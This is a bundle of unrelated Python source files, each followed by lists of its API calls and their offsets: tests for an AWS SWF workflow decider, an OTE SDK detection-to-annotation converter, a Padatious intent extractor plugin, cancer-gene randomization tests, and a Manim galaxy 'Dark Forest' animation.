swf_client(): """Returns a mock boto3 SWF client. See botocore.stub.Stubber docstring for how to use it""" return botocore.stub.Stubber(boto3.client('swf')) @pytest.fixture def decider(swf_client): return pyflow.Decider([StringTransformer, StringConcatter], domain='test-domain', task_list='string-transformer-decider', identity='string transformer decider', client=swf_client) @attr.s class DeciderTestCase(object): name = attr.ib() decision_task = attr.ib() expected_decisions = attr.ib() process_decision_task_test_cases = [ DeciderTestCase('decision_task00', decision_tasks.decision_task00, [ {'decisionType': 'ScheduleLambdaFunction', 'scheduleLambdaFunctionDecisionAttributes': { 'id': 'lambda1', 'name': 'string_upcase', 'input': '"Hello"'} }, {'decisionType': 'ScheduleLambdaFunction', 'scheduleLambdaFunctionDecisionAttributes': { 'id': 'lambda2', 'name': 'string_upcase', 'input': '" "'} }, {'decisionType': 'ScheduleLambdaFunction', 'scheduleLambdaFunctionDecisionAttributes': { 'id': 'lambda3', 'name': 'string_upcase', 'input': '"World"'} }, {'decisionType': 'ScheduleLambdaFunction', 'scheduleLambdaFunctionDecisionAttributes': { 'id': 'lambda4', 'name': 'string_upcase', 'input': '42'} } ]), # Continued from task00, but lambda2 invocation has completed DeciderTestCase('decision_task01', decision_tasks.decision_task01, []), # Now lambda1 has completed, and lambda4 has failed DeciderTestCase('decision_task02', decision_tasks.decision_task02, [ {'decisionType': 'ScheduleLambdaFunction', 'scheduleLambdaFunctionDecisionAttributes': { 'id': 'lambda5', 'name': 'string_reverse', 'input': '"HELLO"'} }, {'decisionType': 'ScheduleLambdaFunction', 'scheduleLambdaFunctionDecisionAttributes': { 'id': 'lambda6', 'name': 'string_reverse', 'input': '" "'} } ]), # Now lambda3 has completed DeciderTestCase('decision_task03', decision_tasks.decision_task03, [ {'decisionType': 'ScheduleLambdaFunction', 'scheduleLambdaFunctionDecisionAttributes': { 'id': 'lambda7', 'name': 'string_reverse', 'input': '"WORLD"'} }, {'decisionType': 'StartTimer', 'startTimerDecisionAttributes': { 'startToFireTimeout': "5", 'timerId': "sleep1"} } ]), # lambda5 and lambda6 completed DeciderTestCase('decision_task04', decision_tasks.decision_task04, []), # lambda7 completed DeciderTestCase('decision_task05', decision_tasks.decision_task05, []), # sleep1 completed DeciderTestCase('decision_task06', decision_tasks.decision_task06, [ {'decisionType': 'ScheduleActivityTask', 'scheduleActivityTaskDecisionAttributes': { 'activityId': 'activity1', 'activityType': {'name': 'subscribe_topic_activity', 'version': 'v1'}, 'input': '{"email": "<EMAIL>"}', 'taskList': {'name': 'subscription-activities'}} }, {'decisionType': 'StartChildWorkflowExecution', 'startChildWorkflowExecutionDecisionAttributes': { 'workflowId': 'child_workflow1', 'workflowType': {'name': 'StringConcatter', 'version': '1.0'}, 'input': '["OLLEH", " ", "DLROW"]', 'lambdaRole': 'arn:aws:iam::528461152743:role/swf-lambda'} } ]), # activity1 completed DeciderTestCase('decision_task07', decision_tasks.decision_task07, []), # This is the first decision task for the StringConcatter child workflow DeciderTestCase('decision_task08', decision_tasks.decision_task08, [ {'decisionType': 'ScheduleLambdaFunction', 'scheduleLambdaFunctionDecisionAttributes': { 'id': 'lambda1', 'name': 'string_concat', 'input': '["OLLEH", " ", "DLROW"]'} } ]), # In parent, notifies that child workflow started DeciderTestCase('decision_task09', decision_tasks.decision_task09, []), # lambda1 in the child workflow completed DeciderTestCase('decision_task10', decision_tasks.decision_task10, [ {'decisionType': 'CompleteWorkflowExecution', 'completeWorkflowExecutionDecisionAttributes': { 'result': '"OLLEH DLROW"'} } ]), # child_workflow1 completed DeciderTestCase('decision_task11', decision_tasks.decision_task11, [ {'decisionType': 'CompleteWorkflowExecution', 'completeWorkflowExecutionDecisionAttributes': { 'result': '"OLLEH DLROW"'} } ]) ] @pytest.mark.parametrize('test_case', process_decision_task_test_cases, ids=[tc.name for tc in process_decision_task_test_cases]) def test_process_decision_task(decider, test_case): decision_helper = decider.process_decision_task(test_case.decision_task) assert test_case.expected_decisions == decision_helper.decisions def test_process_decision_task_cumulative(decider): """Like test_process_decision_task, but process all decision tasks in one decider instance""" for test_case in process_decision_task_test_cases: decision_helper = decider.process_decision_task(test_case.decision_task) assert test_case.expected_decisions == decision_helper.decisions, test_case.name def test_process_decision_task_with_workflow_failure(decider): decision_helper = decider.process_decision_task(decision_tasks.decision_task02_error) assert len(decision_helper.decisions) == 1 decision = decision_helper.decisions[0] assert decision['decisionType'] == 'FailWorkflowExecution' assert decision['failWorkflowExecutionDecisionAttributes']['reason'] assert decision['failWorkflowExecutionDecisionAttributes']['details'] def test_invalid_workflow_input(decider): """Validate correct response to invalid JSON being passed as workflow input""" # The workflow should fail, but the decider itself shouldn't fail. decision_helper = decider.process_decision_task(decision_tasks.invalid_workflow_input) assert decision_helper.decisions[0]['decisionType'] == 'FailWorkflowExecution' def test_invalid_activity_output(decider): """Validate correct response to an activity task returning invalid JSON string""" # The correct behavior is for the task to fail, but decider and workflow to continue decision_helper = decider.process_decision_task(decision_tasks.invalid_activity_output) assert decision_helper.workflow_state.invocation_states['activity1'].state == ws.InvocationState.FAILED def test_invalid_child_workflow_output(decider): "Validate correct response to a child workflow returning invalid JSON string" decision_helper = decider.process_decision_task(decision_tasks.invalid_child_workflow_output) assert decision_helper.workflow_state.invocation_states['child_workflow1'].state == ws.InvocationState.FAILED
[ "logging.basicConfig", "pyflow.logger.setLevel", "boto3.client", "pyflow.Decider", "pyflow.LambdaDescriptor", "pytest.mark.parametrize", "pytest.mark.usefixtures", "pyflow.ActivityDescriptor", "pyflow.ChildWorkflowDescriptor", "attr.ib" ]
[((279, 324), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""initialize_logging"""'], {}), "('initialize_logging')\n", (302, 324), False, 'import pytest\n'), ((7287, 7420), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""test_case"""', 'process_decision_task_test_cases'], {'ids': '[tc.name for tc in process_decision_task_test_cases]'}), "('test_case', process_decision_task_test_cases, ids=\n [tc.name for tc in process_decision_task_test_cases])\n", (7310, 7420), False, 'import pytest\n'), ((201, 222), 'logging.basicConfig', 'logging.basicConfig', ([], {}), '()\n', (220, 222), False, 'import logging\n'), ((227, 263), 'pyflow.logger.setLevel', 'pyflow.logger.setLevel', (['logging.INFO'], {}), '(logging.INFO)\n', (249, 263), False, 'import pyflow\n'), ((441, 481), 'pyflow.LambdaDescriptor', 'pyflow.LambdaDescriptor', (['"""string_upcase"""'], {}), "('string_upcase')\n", (464, 481), False, 'import pyflow\n'), ((503, 544), 'pyflow.LambdaDescriptor', 'pyflow.LambdaDescriptor', (['"""string_reverse"""'], {}), "('string_reverse')\n", (526, 544), False, 'import pyflow\n'), ((568, 669), 'pyflow.ActivityDescriptor', 'pyflow.ActivityDescriptor', (['"""subscribe_topic_activity"""', '"""v1"""'], {'task_list': '"""subscription-activities"""'}), "('subscribe_topic_activity', 'v1', task_list=\n 'subscription-activities')\n", (593, 669), False, 'import pyflow\n'), ((686, 804), 'pyflow.ChildWorkflowDescriptor', 'pyflow.ChildWorkflowDescriptor', (['"""StringConcatter"""', '"""1.0"""'], {'lambda_role': '"""arn:aws:iam::528461152743:role/swf-lambda"""'}), "('StringConcatter', '1.0', lambda_role=\n 'arn:aws:iam::528461152743:role/swf-lambda')\n", (716, 804), False, 'import pyflow\n'), ((2498, 2679), 'pyflow.Decider', 'pyflow.Decider', (['[StringTransformer, StringConcatter]'], {'domain': '"""test-domain"""', 'task_list': '"""string-transformer-decider"""', 'identity': '"""string transformer decider"""', 'client': 'swf_client'}), "([StringTransformer, StringConcatter], domain='test-domain',\n task_list='string-transformer-decider', identity=\n 'string transformer decider', client=swf_client)\n", (2512, 2679), False, 'import pyflow\n'), ((2775, 2784), 'attr.ib', 'attr.ib', ([], {}), '()\n', (2782, 2784), False, 'import attr\n'), ((2805, 2814), 'attr.ib', 'attr.ib', ([], {}), '()\n', (2812, 2814), False, 'import attr\n'), ((2840, 2849), 'attr.ib', 'attr.ib', ([], {}), '()\n', (2847, 2849), False, 'import attr\n'), ((2423, 2442), 'boto3.client', 'boto3.client', (['"""swf"""'], {}), "('swf')\n", (2435, 2442), False, 'import boto3\n')]
# INTEL CONFIDENTIAL # # Copyright (C) 2021 Intel Corporation # # This software and the related documents are Intel copyrighted materials, and # your use of them is governed by the express license under which they were provided to # you ("License"). Unless the License provides otherwise, you may not use, modify, copy, # publish, distribute, disclose or transmit this software or the related documents # without Intel's prior written permission. # # This software and the related documents are provided as is, # with no express or implied warranties, other than those that are expressly stated # in the License. import abc from typing import Any, List import numpy as np from ote_sdk.entities.annotation import ( Annotation, AnnotationSceneEntity, AnnotationSceneKind, ) from ote_sdk.entities.id import ID from ote_sdk.entities.label import LabelEntity from ote_sdk.entities.scored_label import ScoredLabel from ote_sdk.entities.shapes.rectangle import Rectangle from ote_sdk.utils.time_utils import now class IPredictionToAnnotationConverter(metaclass=abc.ABCMeta): @abc.abstractmethod def convert_to_annotation(self, predictions: Any) -> AnnotationSceneEntity: """ Convert raw predictions to AnnotationScene format. :param predictions: Raw predictions from the model :return: annotation object containing the shapes obtained from the raw predictions. """ raise NotImplementedError class DetectionToAnnotationConverter(IPredictionToAnnotationConverter): """ Converts Object Detections to Annotations """ def __init__(self, labels: List[LabelEntity]): self.label_map = dict(enumerate(labels)) def convert_to_annotation(self, predictions: np.ndarray) -> AnnotationSceneEntity: """ Converts a set of predictions into an AnnotationScene object :param predictions: Prediction with shape [num_predictions, 6] or [num_predictions, 7] Supported detection formats are * [label, confidence, x1, y1, x2, y2] * [_, label, confidence, x1, y1, x2, y2] .. note:: `label` can be any integer that can be mapped to `self.labels` `confidence` should be a value between 0 and 1 `x1`, `x2`, `y1` and `y2` are expected to be normalized. :returns AnnotationScene: AnnotationScene Object containing the boxes obtained from the prediction """ annotations = self.__convert_to_annotations(predictions) # media_identifier = ImageIdentifier(image_id=ID()) annotation_scene = AnnotationSceneEntity( id=ID(), kind=AnnotationSceneKind.PREDICTION, editor="ote", creation_date=now(), annotations=annotations, ) return annotation_scene def __convert_to_annotations(self, predictions: np.ndarray) -> List[Annotation]: """ Converts a list of Detections to OTE SDK Annotation objects :param predictions: A list of predictions with shape [num_prediction, 6] or [num_predictions, 7] :returns: A list of Annotation objects with Rectangle shapes :raises ValueError: This error is raised if the shape of prediction is not (n, 7) or (n, 6) """ annotations = list() if predictions.shape[1:] < (6,) or predictions.shape[1:] > (7,): raise ValueError( f"Shape of prediction is not expected, expected (n, 7) or (n, 6) " f"got {predictions.shape}" ) for prediction in predictions: if prediction.shape == (7,): # Some OpenVINO models use an output shape of [7,] # If this is the case, skip the first value as it is not used prediction = prediction[1:] label = int(prediction[0]) confidence = prediction[1] scored_label = ScoredLabel(self.label_map[label], confidence) annotations.append( Annotation( Rectangle( prediction[2], prediction[3], prediction[4], prediction[5] ), labels=[scored_label], ) ) return annotations
[ "ote_sdk.utils.time_utils.now", "ote_sdk.entities.id.ID", "ote_sdk.entities.shapes.rectangle.Rectangle", "ote_sdk.entities.scored_label.ScoredLabel" ]
[((4058, 4104), 'ote_sdk.entities.scored_label.ScoredLabel', 'ScoredLabel', (['self.label_map[label]', 'confidence'], {}), '(self.label_map[label], confidence)\n', (4069, 4104), False, 'from ote_sdk.entities.scored_label import ScoredLabel\n'), ((2704, 2708), 'ote_sdk.entities.id.ID', 'ID', ([], {}), '()\n', (2706, 2708), False, 'from ote_sdk.entities.id import ID\n'), ((2811, 2816), 'ote_sdk.utils.time_utils.now', 'now', ([], {}), '()\n', (2814, 2816), False, 'from ote_sdk.utils.time_utils import now\n'), ((4185, 4254), 'ote_sdk.entities.shapes.rectangle.Rectangle', 'Rectangle', (['prediction[2]', 'prediction[3]', 'prediction[4]', 'prediction[5]'], {}), '(prediction[2], prediction[3], prediction[4], prediction[5])\n', (4194, 4254), False, 'from ote_sdk.entities.shapes.rectangle import Rectangle\n')]
from os.path import join, expanduser from threading import Lock from ovos_utils.log import LOG from ovos_utils.xdg_utils import xdg_data_home from padatious import IntentContainer from ovos_plugin_manager.intents import IntentExtractor, IntentPriority, IntentDeterminationStrategy class PadatiousExtractor(IntentExtractor): keyword_based = False def __init__(self, config=None, strategy=IntentDeterminationStrategy.SEGMENT_REMAINDER, priority=IntentPriority.MEDIUM_HIGH, segmenter=None): super().__init__(config, strategy=strategy, priority=priority, segmenter=segmenter) data_dir = expanduser(self.config.get("data_dir", xdg_data_home())) cache_dir = join(data_dir, "padatious") self.lock = Lock() self.container = IntentContainer(cache_dir) def detach_intent(self, intent_name): if intent_name in self.registered_intents: LOG.debug("Detaching padatious intent: " + intent_name) with self.lock: self.container.remove_intent(intent_name) super().detach_intent(intent_name) def register_entity(self, entity_name, samples=None, reload_cache=True): samples = samples or [entity_name] super().register_entity(entity_name, samples) with self.lock: self.container.add_entity(entity_name, samples, reload_cache=reload_cache) def register_intent(self, intent_name, samples=None, reload_cache=True): samples = samples or [intent_name] super().register_intent(intent_name, samples) with self.lock: self.container.add_intent(intent_name, samples, reload_cache=reload_cache) self.registered_intents.append(intent_name) def register_entity_from_file(self, entity_name, file_name, reload_cache=True): super().register_entity_from_file(entity_name, file_name) with self.lock: self.container.load_entity(entity_name, file_name, reload_cache=reload_cache) def register_intent_from_file(self, intent_name, file_name, single_thread=True, timeout=120, reload_cache=True, force_training=True): super().register_intent_from_file(intent_name, file_name) try: with self.lock: self.container.load_intent(intent_name, file_name, reload_cache=reload_cache) self.registered_intents.append(intent_name) success = self._train(single_thread=single_thread, timeout=timeout, force_training=force_training) if success: LOG.debug(file_name + " trained successfully") else: LOG.error(file_name + " FAILED TO TRAIN") except Exception as e: LOG.exception(e) def _get_remainder(self, intent, utterance): if intent["name"] in self.intent_samples: return self.get_utterance_remainder( utterance, samples=self.intent_samples[intent["name"]]) return utterance def calc_intent(self, utterance, min_conf=0.0): min_conf = min_conf or self.config.get("padatious_min_conf", 0.35) utterance = utterance.strip().lower() with self.lock: intent = self.container.calc_intent(utterance).__dict__ if intent["conf"] < min_conf: return {"intent_type": "unknown", "entities": {}, "conf": 0, "intent_engine": "padatious", "utterance": utterance, "utterance_remainder": utterance} intent["utterance_remainder"] = self._get_remainder(intent, utterance) intent["entities"] = intent.pop("matches") intent["intent_engine"] = "padatious" intent["intent_type"] = intent.pop("name") intent["utterance"] = intent.pop("sent") if isinstance(intent["utterance"], list): intent["utterance"] = " ".join(intent["utterance"]) return intent def _train(self, single_thread=True, timeout=120, force_training=True): with self.lock: return self.container.train(single_thread=single_thread, timeout=timeout, force=force_training, debug=True)
[ "threading.Lock", "os.path.join", "ovos_utils.log.LOG.error", "ovos_utils.log.LOG.exception", "padatious.IntentContainer", "ovos_utils.xdg_utils.xdg_data_home", "ovos_utils.log.LOG.debug" ]
[((764, 791), 'os.path.join', 'join', (['data_dir', '"""padatious"""'], {}), "(data_dir, 'padatious')\n", (768, 791), False, 'from os.path import join, expanduser\n'), ((812, 818), 'threading.Lock', 'Lock', ([], {}), '()\n', (816, 818), False, 'from threading import Lock\n'), ((844, 870), 'padatious.IntentContainer', 'IntentContainer', (['cache_dir'], {}), '(cache_dir)\n', (859, 870), False, 'from padatious import IntentContainer\n'), ((977, 1032), 'ovos_utils.log.LOG.debug', 'LOG.debug', (["('Detaching padatious intent: ' + intent_name)"], {}), "('Detaching padatious intent: ' + intent_name)\n", (986, 1032), False, 'from ovos_utils.log import LOG\n'), ((726, 741), 'ovos_utils.xdg_utils.xdg_data_home', 'xdg_data_home', ([], {}), '()\n', (739, 741), False, 'from ovos_utils.xdg_utils import xdg_data_home\n'), ((2926, 2972), 'ovos_utils.log.LOG.debug', 'LOG.debug', (["(file_name + ' trained successfully')"], {}), "(file_name + ' trained successfully')\n", (2935, 2972), False, 'from ovos_utils.log import LOG\n'), ((3007, 3048), 'ovos_utils.log.LOG.error', 'LOG.error', (["(file_name + ' FAILED TO TRAIN')"], {}), "(file_name + ' FAILED TO TRAIN')\n", (3016, 3048), False, 'from ovos_utils.log import LOG\n'), ((3093, 3109), 'ovos_utils.log.LOG.exception', 'LOG.exception', (['e'], {}), '(e)\n', (3106, 3109), False, 'from ovos_utils.log import LOG\n')]
# fix problems with pythons terrible import system import os import sys file_dir = os.path.dirname(os.path.realpath(__file__)) #sys.path.append(os.path.join(file_dir, '../bin/')) sys.path.append(os.path.join(file_dir, '..')) import prob2020.console.randomization_test as pt import prob2020.python.utils as utils import prob2020.python.mutation_context as mc import numpy as np def test_ctnnb1_main(): opts = {'input': os.path.join(file_dir, 'data/CTNNB1.fa'), 'bed': os.path.join(file_dir, 'data/CTNNB1.bed'), 'mutations': os.path.join(file_dir, 'data/CTNNB1_mutations.txt'), 'output': os.path.join(file_dir, 'output/CTNNB1_output.txt'), 'context': 1, 'use_unmapped': False, 'tsg_score': .1, 'recurrent': 3, 'fraction': .02, 'score_dir': os.path.join(file_dir, 'data/scores'), 'processes': 0, 'num_iterations': 10000, 'stop_criteria': 100, 'recurrent_pseudo_count': 0, 'unique': 0, 'seed': None, 'kind': 'oncogene'} # single nucleotide context result = pt.main(opts) assert result.ix[0, 'entropy p-value'] < 0.001, 'CTNNB1 should have a very low p-value ({0}>.001)'.format(result[0][2]) # di-nucleotide case opts['context'] = 2 result = pt.main(opts) assert result.ix[0, 'entropy p-value'] < 0.001, 'CTNNB1 should have a very low p-value ({0}>.001)'.format(result[0][2]) # no context case opts['context'] = 0 result = pt.main(opts) assert result.ix[0, 'entropy p-value'] < 0.001, 'CTNNB1 should have a very low p-value ({0}>.001)'.format(result[0][2]) def test_ctnnb1_get_aa_mut_info(): import pysam from prob2020.python.gene_sequence import GeneSequence # read fasta ctnnb1_fasta = os.path.join(file_dir, 'data/CTNNB1.fa') gene_fa = pysam.Fastafile(ctnnb1_fasta) gs = GeneSequence(gene_fa, nuc_context=1) # read CTNNB1 bed file ctnnb1_bed = os.path.join(file_dir, 'data/CTNNB1.bed') bed_list = [b for b in utils.bed_generator(ctnnb1_bed)] gs.set_gene(bed_list[0]) # specify mutation coding_pos = [0] somatic_base = ['C'] # check mutation info aa_info = mc.get_aa_mut_info(coding_pos, somatic_base, gs) ref_codon_msg = 'First codon should be start codon ({0})'.format(aa_info['Reference Codon'][0]) assert aa_info['Reference Codon'][0] == 'ATG', ref_codon_msg assert aa_info['Somatic Codon'][0] == 'CTG', 'First "A" should be replaced with a "C"' assert aa_info['Codon Pos'][0] == 0, 'Start codon should be position 0' def test_100genes_main(): opts = {'input': os.path.join(file_dir, 'data/100genes.fa'), 'bed': os.path.join(file_dir, 'data/100genes.bed'), 'mutations': os.path.join(file_dir, 'data/100genes_mutations.txt'), 'output': os.path.join(file_dir, 'output/100genes_position_single_nuc_output.txt'), 'context': 1, 'tsg_score': .1, 'recurrent': 3, 'fraction': .02, 'use_unmapped': False, 'processes': 0, 'num_iterations': 1000, 'stop_criteria': 100, 'score_dir': os.path.join(file_dir, 'data/scores'), 'recurrent_pseudo_count': 0, 'unique': False, 'seed': None, 'kind': 'oncogene'} # single nucleotide context result = pt.main(opts) #tested_result = result[result['Performed Recurrency Test']==1] num_ent_sig = np.sum(result['entropy BH q-value'] < .1) assert num_ent_sig < 9, 'Few of the 100 test genes should not be significant ({0})'.format(num_ent_sig) # no context case opts['context'] = 0 opts['output'] = os.path.join(file_dir, 'output/100genes_position_no_context_output.txt') result = pt.main(opts) #tested_result = result[result['Performed Recurrency Test']==1] num_ent_sig = np.sum(result['entropy BH q-value'] < .1) assert num_ent_sig < 9, 'Few of the 100 test genes should not be significant ({0})'.format(num_ent_sig) # di-nucleotide context opts['context'] = 2 opts['output'] = os.path.join(file_dir, 'output/100genes_position_dinuc_output.txt') result = pt.main(opts) #tested_result = result[result['Performed Recurrency Test']==1] num_ent_sig = np.sum(result['entropy BH q-value'] < .1) assert num_ent_sig < 9, 'Few of the 100 test genes should not be significant ({0})'.format(num_ent_sig) if __name__ == '__main__': test_100genes_main()
[ "pysam.Fastafile", "prob2020.console.randomization_test.main", "os.path.join", "os.path.realpath", "numpy.sum", "prob2020.python.mutation_context.get_aa_mut_info", "prob2020.python.utils.bed_generator", "prob2020.python.gene_sequence.GeneSequence" ]
[((99, 125), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (115, 125), False, 'import os\n'), ((195, 223), 'os.path.join', 'os.path.join', (['file_dir', '""".."""'], {}), "(file_dir, '..')\n", (207, 223), False, 'import os\n'), ((1160, 1173), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (1167, 1173), True, 'import prob2020.console.randomization_test as pt\n'), ((1361, 1374), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (1368, 1374), True, 'import prob2020.console.randomization_test as pt\n'), ((1559, 1572), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (1566, 1572), True, 'import prob2020.console.randomization_test as pt\n'), ((1847, 1887), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.fa"""'], {}), "(file_dir, 'data/CTNNB1.fa')\n", (1859, 1887), False, 'import os\n'), ((1902, 1931), 'pysam.Fastafile', 'pysam.Fastafile', (['ctnnb1_fasta'], {}), '(ctnnb1_fasta)\n', (1917, 1931), False, 'import pysam\n'), ((1941, 1977), 'prob2020.python.gene_sequence.GeneSequence', 'GeneSequence', (['gene_fa'], {'nuc_context': '(1)'}), '(gene_fa, nuc_context=1)\n', (1953, 1977), False, 'from prob2020.python.gene_sequence import GeneSequence\n'), ((2023, 2064), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.bed"""'], {}), "(file_dir, 'data/CTNNB1.bed')\n", (2035, 2064), False, 'import os\n'), ((2265, 2313), 'prob2020.python.mutation_context.get_aa_mut_info', 'mc.get_aa_mut_info', (['coding_pos', 'somatic_base', 'gs'], {}), '(coding_pos, somatic_base, gs)\n', (2283, 2313), True, 'import prob2020.python.mutation_context as mc\n'), ((3462, 3475), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (3469, 3475), True, 'import prob2020.console.randomization_test as pt\n'), ((3562, 3604), 'numpy.sum', 'np.sum', (["(result['entropy BH q-value'] < 0.1)"], {}), "(result['entropy BH q-value'] < 0.1)\n", (3568, 3604), True, 'import numpy as np\n'), ((3780, 3852), 'os.path.join', 'os.path.join', (['file_dir', '"""output/100genes_position_no_context_output.txt"""'], {}), "(file_dir, 'output/100genes_position_no_context_output.txt')\n", (3792, 3852), False, 'import os\n'), ((3866, 3879), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (3873, 3879), True, 'import prob2020.console.randomization_test as pt\n'), ((3966, 4008), 'numpy.sum', 'np.sum', (["(result['entropy BH q-value'] < 0.1)"], {}), "(result['entropy BH q-value'] < 0.1)\n", (3972, 4008), True, 'import numpy as np\n'), ((4190, 4257), 'os.path.join', 'os.path.join', (['file_dir', '"""output/100genes_position_dinuc_output.txt"""'], {}), "(file_dir, 'output/100genes_position_dinuc_output.txt')\n", (4202, 4257), False, 'import os\n'), ((4271, 4284), 'prob2020.console.randomization_test.main', 'pt.main', (['opts'], {}), '(opts)\n', (4278, 4284), True, 'import prob2020.console.randomization_test as pt\n'), ((4371, 4413), 'numpy.sum', 'np.sum', (["(result['entropy BH q-value'] < 0.1)"], {}), "(result['entropy BH q-value'] < 0.1)\n", (4377, 4413), True, 'import numpy as np\n'), ((425, 465), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.fa"""'], {}), "(file_dir, 'data/CTNNB1.fa')\n", (437, 465), False, 'import os\n'), ((486, 527), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1.bed"""'], {}), "(file_dir, 'data/CTNNB1.bed')\n", (498, 527), False, 'import os\n'), ((554, 605), 'os.path.join', 'os.path.join', (['file_dir', '"""data/CTNNB1_mutations.txt"""'], {}), "(file_dir, 'data/CTNNB1_mutations.txt')\n", (566, 605), False, 'import os\n'), ((629, 679), 'os.path.join', 'os.path.join', (['file_dir', '"""output/CTNNB1_output.txt"""'], {}), "(file_dir, 'output/CTNNB1_output.txt')\n", (641, 679), False, 'import os\n'), ((853, 890), 'os.path.join', 'os.path.join', (['file_dir', '"""data/scores"""'], {}), "(file_dir, 'data/scores')\n", (865, 890), False, 'import os\n'), ((2696, 2738), 'os.path.join', 'os.path.join', (['file_dir', '"""data/100genes.fa"""'], {}), "(file_dir, 'data/100genes.fa')\n", (2708, 2738), False, 'import os\n'), ((2759, 2802), 'os.path.join', 'os.path.join', (['file_dir', '"""data/100genes.bed"""'], {}), "(file_dir, 'data/100genes.bed')\n", (2771, 2802), False, 'import os\n'), ((2829, 2882), 'os.path.join', 'os.path.join', (['file_dir', '"""data/100genes_mutations.txt"""'], {}), "(file_dir, 'data/100genes_mutations.txt')\n", (2841, 2882), False, 'import os\n'), ((2906, 2978), 'os.path.join', 'os.path.join', (['file_dir', '"""output/100genes_position_single_nuc_output.txt"""'], {}), "(file_dir, 'output/100genes_position_single_nuc_output.txt')\n", (2918, 2978), False, 'import os\n'), ((3250, 3287), 'os.path.join', 'os.path.join', (['file_dir', '"""data/scores"""'], {}), "(file_dir, 'data/scores')\n", (3262, 3287), False, 'import os\n'), ((2092, 2123), 'prob2020.python.utils.bed_generator', 'utils.bed_generator', (['ctnnb1_bed'], {}), '(ctnnb1_bed)\n', (2111, 2123), True, 'import prob2020.python.utils as utils\n')]
from manim import * import Galaxy from array import array class DarkForest(Scene): def construct(self): '''建议X:Y=7:4''' GalSizeX = 35 GalSizeY = 20 GalCivilizations = 20 # reduce animation time simple = True self.Universe = Galaxy.Galaxy(GalSizeX, GalSizeY, GalCivilizations) self.year = Text('') self.txts = VGroup() self.lines = VGroup() self.CivLabels = {} self.conveys = [] TConstantX = 7.0/GalSizeX TConstantY = 7.0/GalSizeY self.CivGroup = {} self.updateAge() self.initCivs(simple=simple) self.initIR(simple=simple) self.label() # Begin Galaxy Development while not self.Universe.end(): self.Universe.move() # self.drawConvey() for i in self.Universe.New: self.addCiv(i) self.Universe.New = [] self.drawRelations() self.updateAge() self.checkChangeAttitude() self.drawIR() self.checkDead() # print(CivGroup) self.ending() # def drawConvey(self): # for i in self.conveys: # self.remove(i) # self.conveys.remove(i) # for civ in self.Universe.Civilizations: # for i in civ.Conveys: # if i.Distance >0: # if i.Friend: # c = ImageMobject('conveygreen.png') # c.rotate((i.Angle-90)*DEGREES) # c.move_to(i.transformCoord()) # c.scale(0.1) # self.add(c) # self.conveys.append(c) # else: # c = ImageMobject('conveyred.png') # c.rotate((i.Angle-90)*DEGREES) # c.move_to(i.transformCoord()) # c.scale(0.1) # self.add(c) # print(i.Rad) # self.conveys.append(c) def addCiv(self, civ): self.CivGroup[civ] = VGroup(Dot(point=ORIGIN, radius=0.05)) if civ.Attitude == 1: self.CivGroup[civ][0].set_color(GREEN) elif civ.Attitude == 2: self.CivGroup[civ][0].set_color(RED) elif civ.Attitude == 3: self.CivGroup[civ][0].set_color(YELLOW) else: self.CivGroup[civ][0].set_color(GREY) self.play(FadeIn(self.CivGroup[civ][0])) self.wait(0.1) self.play(ApplyMethod(self.CivGroup[civ][0].shift, civ.transformCoord()), run_time=1) IR = Ellipse(width=civ.IRadius*(6.8/self.Universe.Xsize), height=civ.IRadius*(3.886/self.Universe.Ysize), stroke_width=1) self.CivGroup[civ].add(IR) IR.move_to(civ.transformCoord()) if civ.Attitude == 1: self.CivGroup[civ][1].set_color(GREEN) elif civ.Attitude == 2: self.CivGroup[civ][1].set_color(RED) elif civ.Attitude == 3: self.CivGroup[civ][1].set_color(YELLOW) else: self.CivGroup[civ][1].set_color(GREY) self.play(Create(IR)) a = civ.Name[4:] print(a) try: t = Text(a) except Exception: t = Text('No. ????') t.scale(0.2) t.next_to(self.CivGroup[civ][0], direction=RIGHT, ) self.add(t) self.CivLabels[civ] = t self.txts.add(t) def drawRelations(self): # self.play(FadeOut(self.lines)) for i in self.lines: self.remove(i) self.lines.remove(i) for civ in self.Universe.Civilizations: for war in civ.War: l = Line(civ.transformCoord(), war.transformCoord(), stroke_width=0.8).set_color(RED) self.lines.add(l) self.add(l) for ally in civ.Ally: l = Line(civ.transformCoord(), ally.transformCoord(), stroke_width=0.8).set_color(GREEN) self.lines.add(l) self.add(l) def ending(self): self.play(FadeOut(self.txts)) self.play(FadeOut(self.lines)) self.remove(self.txts) for civ in self.Universe.Civilizations: self.play(FadeOut(self.CivGroup[civ])) self.remove(self.CivGroup[civ]) civ = self.Universe.Civilizations[0] self.WIN = Dot(radius=1) if civ.Attitude == 1: self.WIN.set_color(GREEN) elif civ.Attitude == 2: self.WIN.set_color(RED) elif civ.Attitude == 3: self.WIN.set_color(YELLOW) else: self.WIN.set_color(GREY) self.play(FadeIn(self.WIN)) self.wait(2) info = Text(f'{civ.Name}\nTech: {civ.Tech}\nPower: {round(civ.Power, 2)}\nAttitude: {civ.Attitude}') info.scale(0.8) self.play(ApplyMethod(self.WIN.move_to, LEFT*2.5), run_time=1) info.next_to(self.WIN, direction=RIGHT, ) self.play(FadeIn(info)) self.wait(4) self.play(FadeOut(info), FadeOut(self.WIN)) self.galaxyStats() def galaxyStats(self): logo = ImageMobject('galaxy.png', invert=True) logo.scale(0.4) t = '' for i in self.Universe.Stats.keys(): t+= str(i)+': '+str(round(self.Universe.Stats[i],2))+'\n' info = Text(t) info.scale(0.8) self.play(FadeIn(logo)) self.play(ApplyMethod(logo.move_to, LEFT*2)) info.next_to(logo, direction=RIGHT) self.play(FadeIn(info)) self.wait() def checkDead(self): if(len(self.Universe.Dead)>0): for civ in self.Universe.Dead: self.play(FadeOut(self.CivGroup[civ][0]), FadeOut(self.CivGroup[civ][1]), FadeOut(self.CivLabels[civ])) self.remove(self.CivGroup[civ]) self.CivGroup.pop(civ) 